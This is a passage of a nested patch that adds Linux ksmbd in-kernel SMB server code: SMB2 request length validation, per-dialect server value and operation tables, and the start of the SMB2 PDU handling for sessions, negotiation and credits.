++		ksmbd_debug(SMB, "Illegal SMB2 command %d\n", command);
++		return 1;
++	}
++
++	if (smb2_req_struct_sizes[command] != pdu->StructureSize2) {
++		if (command == SMB2_OPLOCK_BREAK_HE &&
++		    le16_to_cpu(pdu->StructureSize2) != OP_BREAK_STRUCT_SIZE_20 &&
++		    le16_to_cpu(pdu->StructureSize2) != OP_BREAK_STRUCT_SIZE_21) {
++			/* special case for SMB2.1 lease break message */
++			ksmbd_debug(SMB,
++				    "Illegal request size %d for oplock break\n",
++				    le16_to_cpu(pdu->StructureSize2));
++			return 1;
++		}
++	}
++
++	req_struct_size = le16_to_cpu(pdu->StructureSize2) +
++		__SMB2_HEADER_STRUCTURE_SIZE;
++	if (command == SMB2_LOCK_HE)
++		req_struct_size -= sizeof(struct smb2_lock_element);
++
++	if (req_struct_size > len + 1)
++		return 1;
++
++	if (smb2_calc_size(hdr, &clc_len))
++		return 1;
++
++	if (len != clc_len) {
++		/* client can return one byte more due to implied bcc[0] */
++		if (clc_len == len + 1)
++			goto validate_credit;
++
++		/*
++		 * Some Windows servers (win2016) will also pad the final
++		 * PDU in a compound to 8 bytes.
++		 */
++		if (ALIGN(clc_len, 8) == len)
++			goto validate_credit;
++
++		/*
++		 * SMB2 NEGOTIATE request will be validated when message
++		 * handling proceeds.
++		 */
++		if (command == SMB2_NEGOTIATE_HE)
++			goto validate_credit;
++
++		/*
++		 * Allow a message padded to an 8-byte boundary.
++		 * Linux 4.19.217 with smb 3.0.2 sometimes
++		 * sends messages where clc_len is exactly
++		 * 8 bytes less than len.
++		 */
++		if (clc_len < len && (len - clc_len) <= 8)
++			goto validate_credit;
++
++		pr_err_ratelimited(
++			    "cli req too short, len %d not %d. cmd:%d mid:%llu\n",
++			    len, clc_len, command,
++			    le64_to_cpu(hdr->MessageId));
++
++		return 1;
++	}
++
++validate_credit:
++	if ((work->conn->vals->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU) &&
++	    smb2_validate_credit_charge(work->conn, hdr)) {
++		work->conn->ops->set_rsp_status(work, STATUS_INVALID_PARAMETER);
++		return 1;
++	}
++
++	return 0;
++}
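
NEGOTIATE aside, the tolerated length mismatches above can be summarized in a
single predicate; a hypothetical helper, not in this patch, equivalent to the
goto chain:

	static bool smb2_len_acceptable(__u32 clc_len, __u32 len)
	{
		return clc_len == len ||
		       clc_len == len + 1 ||		/* implied bcc[0] */
		       ALIGN(clc_len, 8) == len ||	/* 8-byte padded final PDU */
		       (clc_len < len && len - clc_len <= 8);	/* legacy clients */
	}
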
++
++int smb2_negotiate_request(struct ksmbd_work *work)
++{
++	return ksmbd_smb_negotiate_common(work, SMB2_NEGOTIATE_HE);
++}
+diff --git a/fs/smb/server/smb2ops.c b/fs/smb/server/smb2ops.c
+new file mode 100644
+index 0000000000000..ab23da2120b94
+--- /dev/null
++++ b/fs/smb/server/smb2ops.c
+@@ -0,0 +1,314 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/slab.h>
++#include "glob.h"
++
++#include "auth.h"
++#include "connection.h"
++#include "smb_common.h"
++#include "server.h"
++
++static struct smb_version_values smb21_server_values = {
++	.version_string = SMB21_VERSION_STRING,
++	.protocol_id = SMB21_PROT_ID,
++	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
++	.max_read_size = SMB21_DEFAULT_IOSIZE,
++	.max_write_size = SMB21_DEFAULT_IOSIZE,
++	.max_trans_size = SMB21_DEFAULT_IOSIZE,
++	.max_credits = SMB2_MAX_CREDITS,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.create_lease_size = sizeof(struct create_lease),
++	.create_durable_size = sizeof(struct create_durable_rsp),
++	.create_mxac_size = sizeof(struct create_mxac_rsp),
++	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
++	.create_posix_size = sizeof(struct create_posix_rsp),
++};
++
++static struct smb_version_values smb30_server_values = {
++	.version_string = SMB30_VERSION_STRING,
++	.protocol_id = SMB30_PROT_ID,
++	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
++	.max_read_size = SMB3_DEFAULT_IOSIZE,
++	.max_write_size = SMB3_DEFAULT_IOSIZE,
++	.max_trans_size = SMB3_DEFAULT_TRANS_SIZE,
++	.max_credits = SMB2_MAX_CREDITS,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.create_lease_size = sizeof(struct create_lease_v2),
++	.create_durable_size = sizeof(struct create_durable_rsp),
++	.create_durable_v2_size = sizeof(struct create_durable_v2_rsp),
++	.create_mxac_size = sizeof(struct create_mxac_rsp),
++	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
++	.create_posix_size = sizeof(struct create_posix_rsp),
++};
++
++static struct smb_version_values smb302_server_values = {
++	.version_string = SMB302_VERSION_STRING,
++	.protocol_id = SMB302_PROT_ID,
++	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
++	.max_read_size = SMB3_DEFAULT_IOSIZE,
++	.max_write_size = SMB3_DEFAULT_IOSIZE,
++	.max_trans_size = SMB3_DEFAULT_TRANS_SIZE,
++	.max_credits = SMB2_MAX_CREDITS,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.create_lease_size = sizeof(struct create_lease_v2),
++	.create_durable_size = sizeof(struct create_durable_rsp),
++	.create_durable_v2_size = sizeof(struct create_durable_v2_rsp),
++	.create_mxac_size = sizeof(struct create_mxac_rsp),
++	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
++	.create_posix_size = sizeof(struct create_posix_rsp),
++};
++
++static struct smb_version_values smb311_server_values = {
++	.version_string = SMB311_VERSION_STRING,
++	.protocol_id = SMB311_PROT_ID,
++	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
++	.max_read_size = SMB3_DEFAULT_IOSIZE,
++	.max_write_size = SMB3_DEFAULT_IOSIZE,
++	.max_trans_size = SMB3_DEFAULT_TRANS_SIZE,
++	.max_credits = SMB2_MAX_CREDITS,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.create_lease_size = sizeof(struct create_lease_v2),
++	.create_durable_size = sizeof(struct create_durable_rsp),
++	.create_durable_v2_size = sizeof(struct create_durable_v2_rsp),
++	.create_mxac_size = sizeof(struct create_mxac_rsp),
++	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
++	.create_posix_size = sizeof(struct create_posix_rsp),
++};
++
++static struct smb_version_ops smb2_0_server_ops = {
++	.get_cmd_val		=	get_smb2_cmd_val,
++	.init_rsp_hdr		=	init_smb2_rsp_hdr,
++	.set_rsp_status		=	set_smb2_rsp_status,
++	.allocate_rsp_buf       =       smb2_allocate_rsp_buf,
++	.set_rsp_credits	=	smb2_set_rsp_credits,
++	.check_user_session	=	smb2_check_user_session,
++	.get_ksmbd_tcon		=	smb2_get_ksmbd_tcon,
++	.is_sign_req		=	smb2_is_sign_req,
++	.check_sign_req		=	smb2_check_sign_req,
++	.set_sign_rsp		=	smb2_set_sign_rsp
++};
++
++static struct smb_version_ops smb3_0_server_ops = {
++	.get_cmd_val		=	get_smb2_cmd_val,
++	.init_rsp_hdr		=	init_smb2_rsp_hdr,
++	.set_rsp_status		=	set_smb2_rsp_status,
++	.allocate_rsp_buf       =       smb2_allocate_rsp_buf,
++	.set_rsp_credits	=	smb2_set_rsp_credits,
++	.check_user_session	=	smb2_check_user_session,
++	.get_ksmbd_tcon		=	smb2_get_ksmbd_tcon,
++	.is_sign_req		=	smb2_is_sign_req,
++	.check_sign_req		=	smb3_check_sign_req,
++	.set_sign_rsp		=	smb3_set_sign_rsp,
++	.generate_signingkey	=	ksmbd_gen_smb30_signingkey,
++	.generate_encryptionkey	=	ksmbd_gen_smb30_encryptionkey,
++	.is_transform_hdr	=	smb3_is_transform_hdr,
++	.decrypt_req		=	smb3_decrypt_req,
++	.encrypt_resp		=	smb3_encrypt_resp
++};
++
++static struct smb_version_ops smb3_11_server_ops = {
++	.get_cmd_val		=	get_smb2_cmd_val,
++	.init_rsp_hdr		=	init_smb2_rsp_hdr,
++	.set_rsp_status		=	set_smb2_rsp_status,
++	.allocate_rsp_buf       =       smb2_allocate_rsp_buf,
++	.set_rsp_credits	=	smb2_set_rsp_credits,
++	.check_user_session	=	smb2_check_user_session,
++	.get_ksmbd_tcon		=	smb2_get_ksmbd_tcon,
++	.is_sign_req		=	smb2_is_sign_req,
++	.check_sign_req		=	smb3_check_sign_req,
++	.set_sign_rsp		=	smb3_set_sign_rsp,
++	.generate_signingkey	=	ksmbd_gen_smb311_signingkey,
++	.generate_encryptionkey	=	ksmbd_gen_smb311_encryptionkey,
++	.is_transform_hdr	=	smb3_is_transform_hdr,
++	.decrypt_req		=	smb3_decrypt_req,
++	.encrypt_resp		=	smb3_encrypt_resp
++};
++
++static struct smb_version_cmds smb2_0_server_cmds[NUMBER_OF_SMB2_COMMANDS] = {
++	[SMB2_NEGOTIATE_HE]	=	{ .proc = smb2_negotiate_request, },
++	[SMB2_SESSION_SETUP_HE] =	{ .proc = smb2_sess_setup, },
++	[SMB2_TREE_CONNECT_HE]  =	{ .proc = smb2_tree_connect,},
++	[SMB2_TREE_DISCONNECT_HE]  =	{ .proc = smb2_tree_disconnect,},
++	[SMB2_LOGOFF_HE]	=	{ .proc = smb2_session_logoff,},
++	[SMB2_CREATE_HE]	=	{ .proc = smb2_open},
++	[SMB2_QUERY_INFO_HE]	=	{ .proc = smb2_query_info},
++	[SMB2_QUERY_DIRECTORY_HE] =	{ .proc = smb2_query_dir},
++	[SMB2_CLOSE_HE]		=	{ .proc = smb2_close},
++	[SMB2_ECHO_HE]		=	{ .proc = smb2_echo},
++	[SMB2_SET_INFO_HE]      =       { .proc = smb2_set_info},
++	[SMB2_READ_HE]		=	{ .proc = smb2_read},
++	[SMB2_WRITE_HE]		=	{ .proc = smb2_write},
++	[SMB2_FLUSH_HE]		=	{ .proc = smb2_flush},
++	[SMB2_CANCEL_HE]	=	{ .proc = smb2_cancel},
++	[SMB2_LOCK_HE]		=	{ .proc = smb2_lock},
++	[SMB2_IOCTL_HE]		=	{ .proc = smb2_ioctl},
++	[SMB2_OPLOCK_BREAK_HE]	=	{ .proc = smb2_oplock_break},
++	[SMB2_CHANGE_NOTIFY_HE]	=	{ .proc = smb2_notify},
++};
++
++/**
++ * init_smb2_1_server() - initialize a smb server connection with smb2.1
++ *			command dispatcher
++ * @conn:	connection instance
++ */
++void init_smb2_1_server(struct ksmbd_conn *conn)
++{
++	conn->vals = &smb21_server_values;
++	conn->ops = &smb2_0_server_ops;
++	conn->cmds = smb2_0_server_cmds;
++	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
++	conn->signing_algorithm = SIGNING_ALG_HMAC_SHA256_LE;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
++}
++
++/**
++ * init_smb3_0_server() - initialize a smb server connection with smb3.0
++ *			command dispatcher
++ * @conn:	connection instance
++ */
++void init_smb3_0_server(struct ksmbd_conn *conn)
++{
++	conn->vals = &smb30_server_values;
++	conn->ops = &smb3_0_server_ops;
++	conn->cmds = smb2_0_server_cmds;
++	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
++	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION &&
++	    conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
++}
++
++/**
++ * init_smb3_02_server() - initialize a smb server connection with smb3.02
++ *			command dispatcher
++ * @conn:	connection instance
++ */
++void init_smb3_02_server(struct ksmbd_conn *conn)
++{
++	conn->vals = &smb302_server_values;
++	conn->ops = &smb3_0_server_ops;
++	conn->cmds = smb2_0_server_cmds;
++	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
++	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION &&
++	    conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
++}
++
++/**
++ * init_smb3_11_server() - initialize a smb server connection with smb3.11
++ *			command dispatcher
++ * @conn:	connection instance
++ */
++int init_smb3_11_server(struct ksmbd_conn *conn)
++{
++	conn->vals = &smb311_server_values;
++	conn->ops = &smb3_11_server_ops;
++	conn->cmds = smb2_0_server_cmds;
++	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
++	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
++
++	INIT_LIST_HEAD(&conn->preauth_sess_table);
++	return 0;
++}
++
++void init_smb2_max_read_size(unsigned int sz)
++{
++	sz = clamp_val(sz, SMB3_MIN_IOSIZE, SMB3_MAX_IOSIZE);
++	smb21_server_values.max_read_size = sz;
++	smb30_server_values.max_read_size = sz;
++	smb302_server_values.max_read_size = sz;
++	smb311_server_values.max_read_size = sz;
++}
++
++void init_smb2_max_write_size(unsigned int sz)
++{
++	sz = clamp_val(sz, SMB3_MIN_IOSIZE, SMB3_MAX_IOSIZE);
++	smb21_server_values.max_write_size = sz;
++	smb30_server_values.max_write_size = sz;
++	smb302_server_values.max_write_size = sz;
++	smb311_server_values.max_write_size = sz;
++}
++
++void init_smb2_max_trans_size(unsigned int sz)
++{
++	sz = clamp_val(sz, SMB3_MIN_IOSIZE, SMB3_MAX_IOSIZE);
++	smb21_server_values.max_trans_size = sz;
++	smb30_server_values.max_trans_size = sz;
++	smb302_server_values.max_trans_size = sz;
++	smb311_server_values.max_trans_size = sz;
++}
++
++void init_smb2_max_credits(unsigned int sz)
++{
++	smb21_server_values.max_credits = sz;
++	smb30_server_values.max_credits = sz;
++	smb302_server_values.max_credits = sz;
++	smb311_server_values.max_credits = sz;
++}
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+new file mode 100644
+index 0000000000000..2b7c0ba6a77de
+--- /dev/null
++++ b/fs/smb/server/smb2pdu.c
+@@ -0,0 +1,8727 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/inetdevice.h>
++#include <net/addrconf.h>
++#include <linux/syscalls.h>
++#include <linux/namei.h>
++#include <linux/statfs.h>
++#include <linux/ethtool.h>
++#include <linux/falloc.h>
++#include <linux/mount.h>
++
++#include "glob.h"
++#include "smbfsctl.h"
++#include "oplock.h"
++#include "smbacl.h"
++
++#include "auth.h"
++#include "asn1.h"
++#include "connection.h"
++#include "transport_ipc.h"
++#include "transport_rdma.h"
++#include "vfs.h"
++#include "vfs_cache.h"
++#include "misc.h"
++
++#include "server.h"
++#include "smb_common.h"
++#include "smbstatus.h"
++#include "ksmbd_work.h"
++#include "mgmt/user_config.h"
++#include "mgmt/share_config.h"
++#include "mgmt/tree_connect.h"
++#include "mgmt/user_session.h"
++#include "mgmt/ksmbd_ida.h"
++#include "ndr.h"
++
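++/*
++ * For a compound request, point at the current command's header within the
++ * shared request/response buffers; otherwise use the first message in each
++ * buffer.
++ */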
++static void __wbuf(struct ksmbd_work *work, void **req, void **rsp)
++{
++	if (work->next_smb2_rcv_hdr_off) {
++		*req = ksmbd_req_buf_next(work);
++		*rsp = ksmbd_resp_buf_next(work);
++	} else {
++		*req = smb2_get_msg(work->request_buf);
++		*rsp = smb2_get_msg(work->response_buf);
++	}
++}
++
++#define WORK_BUFFERS(w, rq, rs)	__wbuf((w), (void **)&(rq), (void **)&(rs))
++
++/**
++ * check_session_id() - check for valid session id in smb header
++ * @conn:	connection instance
++ * @id:		session id from smb header
++ *
++ * Return:      true if the session id is valid, otherwise false
++ */
++static inline bool check_session_id(struct ksmbd_conn *conn, u64 id)
++{
++	struct ksmbd_session *sess;
++
++	if (id == 0 || id == -1)
++		return false;
++
++	sess = ksmbd_session_lookup_all(conn, id);
++	if (sess)
++		return true;
++	pr_err("Invalid user session id: %llu\n", id);
++	return false;
++}
++
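++/* Channels are keyed in the xarray by the connection pointer cast to an index. */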
++struct channel *lookup_chann_list(struct ksmbd_session *sess, struct ksmbd_conn *conn)
++{
++	return xa_load(&sess->ksmbd_chann_list, (long)conn);
++}
++
++/**
++ * smb2_get_ksmbd_tcon() - get tree connection information using a tree id.
++ * @work:	smb work
++ *
++ * Return:	1 if there is a matching tree connection, 0 for commands
++ *		that need no tree connection, otherwise error
++ */
++int smb2_get_ksmbd_tcon(struct ksmbd_work *work)
++{
++	struct smb2_hdr *req_hdr = smb2_get_msg(work->request_buf);
++	unsigned int cmd = le16_to_cpu(req_hdr->Command);
++	int tree_id;
++
++	if (cmd == SMB2_TREE_CONNECT_HE ||
++	    cmd == SMB2_CANCEL_HE ||
++	    cmd == SMB2_LOGOFF_HE) {
++		ksmbd_debug(SMB, "skip to check tree connect request\n");
++		return 0;
++	}
++
++	if (xa_empty(&work->sess->tree_conns)) {
++		ksmbd_debug(SMB, "NO tree connected\n");
++		return -ENOENT;
++	}
++
++	tree_id = le32_to_cpu(req_hdr->Id.SyncId.TreeId);
++
++	/*
++	 * If the request is not the first in a compound request,
++	 * just validate the tree id in the header against work->tcon->id.
++	 */
++	if (work->next_smb2_rcv_hdr_off) {
++		if (!work->tcon) {
++			pr_err("The first operation in the compound does not have tcon\n");
++			return -EINVAL;
++		}
++		if (work->tcon->id != tree_id) {
++			pr_err("tree id(%u) is different with id(%u) in first operation\n",
++					tree_id, work->tcon->id);
++			return -EINVAL;
++		}
++		return 1;
++	}
++
++	work->tcon = ksmbd_tree_conn_lookup(work->sess, tree_id);
++	if (!work->tcon) {
++		pr_err("Invalid tid %d\n", tree_id);
++		return -ENOENT;
++	}
++
++	return 1;
++}
++
++/**
++ * smb2_set_err_rsp() - set error response code on smb response
++ * @work:	smb work containing response buffer
++ */
++void smb2_set_err_rsp(struct ksmbd_work *work)
++{
++	struct smb2_err_rsp *err_rsp;
++
++	if (work->next_smb2_rcv_hdr_off)
++		err_rsp = ksmbd_resp_buf_next(work);
++	else
++		err_rsp = smb2_get_msg(work->response_buf);
++
++	if (err_rsp->hdr.Status != STATUS_STOPPED_ON_SYMLINK) {
++		err_rsp->StructureSize = SMB2_ERROR_STRUCTURE_SIZE2_LE;
++		err_rsp->ErrorContextCount = 0;
++		err_rsp->Reserved = 0;
++		err_rsp->ByteCount = 0;
++		err_rsp->ErrorData[0] = 0;
++		inc_rfc1001_len(work->response_buf, SMB2_ERROR_STRUCTURE_SIZE2);
++	}
++}
++
++/**
++ * is_smb2_neg_cmd() - is it smb2 negotiation command
++ * @work:	smb work containing smb header
++ *
++ * Return:      true if smb2 negotiation command, otherwise false
++ */
++bool is_smb2_neg_cmd(struct ksmbd_work *work)
++{
++	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
++
++	/* is it an SMB2 header? */
++	if (hdr->ProtocolId != SMB2_PROTO_NUMBER)
++		return false;
++
++	/* make sure it is a request, not a response message */
++	if (hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR)
++		return false;
++
++	if (hdr->Command != SMB2_NEGOTIATE)
++		return false;
++
++	return true;
++}
++
++/**
++ * is_smb2_rsp() - is it smb2 response
++ * @work:	smb work containing smb response buffer
++ *
++ * Return:      true if smb2 response, otherwise false
++ */
++bool is_smb2_rsp(struct ksmbd_work *work)
++{
++	struct smb2_hdr *hdr = smb2_get_msg(work->response_buf);
++
++	/* is it an SMB2 header? */
++	if (hdr->ProtocolId != SMB2_PROTO_NUMBER)
++		return false;
++
++	/* make sure it is a response, not a request message */
++	if (!(hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR))
++		return false;
++
++	return true;
++}
++
++/**
++ * get_smb2_cmd_val() - get smb command code from smb header
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      smb2 request command value
++ */
++u16 get_smb2_cmd_val(struct ksmbd_work *work)
++{
++	struct smb2_hdr *rcv_hdr;
++
++	if (work->next_smb2_rcv_hdr_off)
++		rcv_hdr = ksmbd_req_buf_next(work);
++	else
++		rcv_hdr = smb2_get_msg(work->request_buf);
++	return le16_to_cpu(rcv_hdr->Command);
++}
++
++/**
++ * set_smb2_rsp_status() - set error response code on smb2 header
++ * @work:	smb work containing response buffer
++ * @err:	error response code
++ */
++void set_smb2_rsp_status(struct ksmbd_work *work, __le32 err)
++{
++	struct smb2_hdr *rsp_hdr;
++
++	if (work->next_smb2_rcv_hdr_off)
++		rsp_hdr = ksmbd_resp_buf_next(work);
++	else
++		rsp_hdr = smb2_get_msg(work->response_buf);
++	rsp_hdr->Status = err;
++	smb2_set_err_rsp(work);
++}
++
++/**
++ * init_smb2_neg_rsp() - initialize smb2 response for negotiate command
++ * @work:	smb work containing smb request buffer
++ *
++ * The smb2 negotiate response is sent in reply to an smb1 negotiate command
++ * for dialect auto-negotiation.
++ */
++int init_smb2_neg_rsp(struct ksmbd_work *work)
++{
++	struct smb2_hdr *rsp_hdr;
++	struct smb2_negotiate_rsp *rsp;
++	struct ksmbd_conn *conn = work->conn;
++
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(conn->vals->header_size);
++
++	rsp_hdr = smb2_get_msg(work->response_buf);
++	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
++	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
++	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
++	rsp_hdr->CreditRequest = cpu_to_le16(2);
++	rsp_hdr->Command = SMB2_NEGOTIATE;
++	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
++	rsp_hdr->NextCommand = 0;
++	rsp_hdr->MessageId = 0;
++	rsp_hdr->Id.SyncId.ProcessId = 0;
++	rsp_hdr->Id.SyncId.TreeId = 0;
++	rsp_hdr->SessionId = 0;
++	memset(rsp_hdr->Signature, 0, 16);
++
++	rsp = smb2_get_msg(work->response_buf);
++
++	WARN_ON(ksmbd_conn_good(conn));
++
++	rsp->StructureSize = cpu_to_le16(65);
++	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
++	rsp->DialectRevision = cpu_to_le16(conn->dialect);
++	/* Not setting conn guid rsp->ServerGUID, as it is
++	 * not used by the client for identifying the connection
++	 */
++	rsp->Capabilities = cpu_to_le32(conn->vals->capabilities);
++	/* Default max message size up to SMB 2.0 is 64K */
++	rsp->MaxTransactSize = cpu_to_le32(conn->vals->max_trans_size);
++	rsp->MaxReadSize = cpu_to_le32(conn->vals->max_read_size);
++	rsp->MaxWriteSize = cpu_to_le32(conn->vals->max_write_size);
++
++	rsp->SystemTime = cpu_to_le64(ksmbd_systime());
++	rsp->ServerStartTime = 0;
++
++	rsp->SecurityBufferOffset = cpu_to_le16(128);
++	rsp->SecurityBufferLength = cpu_to_le16(AUTH_GSS_LENGTH);
++	ksmbd_copy_gss_neg_header((char *)(&rsp->hdr) +
++		le16_to_cpu(rsp->SecurityBufferOffset));
++	inc_rfc1001_len(work->response_buf,
++			sizeof(struct smb2_negotiate_rsp) -
++			sizeof(struct smb2_hdr) - sizeof(rsp->Buffer) +
++			AUTH_GSS_LENGTH);
++	rsp->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED_LE;
++	if (server_conf.signing == KSMBD_CONFIG_OPT_MANDATORY)
++		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
++	conn->use_spnego = true;
++
++	ksmbd_conn_set_need_negotiate(conn);
++	return 0;
++}
++
++/**
++ * smb2_set_rsp_credits() - set number of credits in response buffer
++ * @work:	smb work containing smb response buffer
++ */
++int smb2_set_rsp_credits(struct ksmbd_work *work)
++{
++	struct smb2_hdr *req_hdr = ksmbd_req_buf_next(work);
++	struct smb2_hdr *hdr = ksmbd_resp_buf_next(work);
++	struct ksmbd_conn *conn = work->conn;
++	unsigned short credits_requested, aux_max;
++	unsigned short credit_charge, credits_granted = 0;
++
++	if (work->send_no_response)
++		return 0;
++
++	hdr->CreditCharge = req_hdr->CreditCharge;
++
++	if (conn->total_credits > conn->vals->max_credits) {
++		hdr->CreditRequest = 0;
++		pr_err("Total credits overflow: %d\n", conn->total_credits);
++		return -EINVAL;
++	}
++
++	credit_charge = max_t(unsigned short,
++			      le16_to_cpu(req_hdr->CreditCharge), 1);
++	if (credit_charge > conn->total_credits) {
++		ksmbd_debug(SMB, "Insufficient credits granted, given: %u, granted: %u\n",
++			    credit_charge, conn->total_credits);
++		return -EINVAL;
++	}
++
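++	/* Consume this request's charge first; the grant computed below is
++	 * capped by the headroom left under conn->vals->max_credits.
++	 */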
++	conn->total_credits -= credit_charge;
++	conn->outstanding_credits -= credit_charge;
++	credits_requested = max_t(unsigned short,
++				  le16_to_cpu(req_hdr->CreditRequest), 1);
++
++	/* According to the smb2.credits smbtorture test, Windows Server
++	 * 2016 or later grants up to 8192 credits at once.
++	 *
++	 * TODO: Need to adjust the CreditRequest value according to
++	 * the current cpu load.
++	 */
++	if (hdr->Command == SMB2_NEGOTIATE)
++		aux_max = 1;
++	else
++		aux_max = conn->vals->max_credits - conn->total_credits;
++	credits_granted = min_t(unsigned short, credits_requested, aux_max);
++
++	conn->total_credits += credits_granted;
++	work->credits_granted += credits_granted;
++
++	if (!req_hdr->NextCommand) {
++		/* Update CreditRequest in last request */
++		hdr->CreditRequest = cpu_to_le16(work->credits_granted);
++	}
++	ksmbd_debug(SMB,
++		    "credits: requested[%d] granted[%d] total_granted[%d]\n",
++		    credits_requested, credits_granted,
++		    conn->total_credits);
++	return 0;
++}
++
++/**
++ * init_chained_smb2_rsp() - initialize smb2 chained response
++ * @work:	smb work containing smb response buffer
++ */
++static void init_chained_smb2_rsp(struct ksmbd_work *work)
++{
++	struct smb2_hdr *req = ksmbd_req_buf_next(work);
++	struct smb2_hdr *rsp = ksmbd_resp_buf_next(work);
++	struct smb2_hdr *rsp_hdr;
++	struct smb2_hdr *rcv_hdr;
++	int next_hdr_offset = 0;
++	int len, new_len;
++
++	/* Len of this response = updated RFC len - offset of previous cmd
++	 * in the compound rsp
++	 */
++
++	/* Store the current local FID, which may be needed by a subsequent
++	 * command in the compound request.
++	 */
++	if (req->Command == SMB2_CREATE && rsp->Status == STATUS_SUCCESS) {
++		work->compound_fid = ((struct smb2_create_rsp *)rsp)->VolatileFileId;
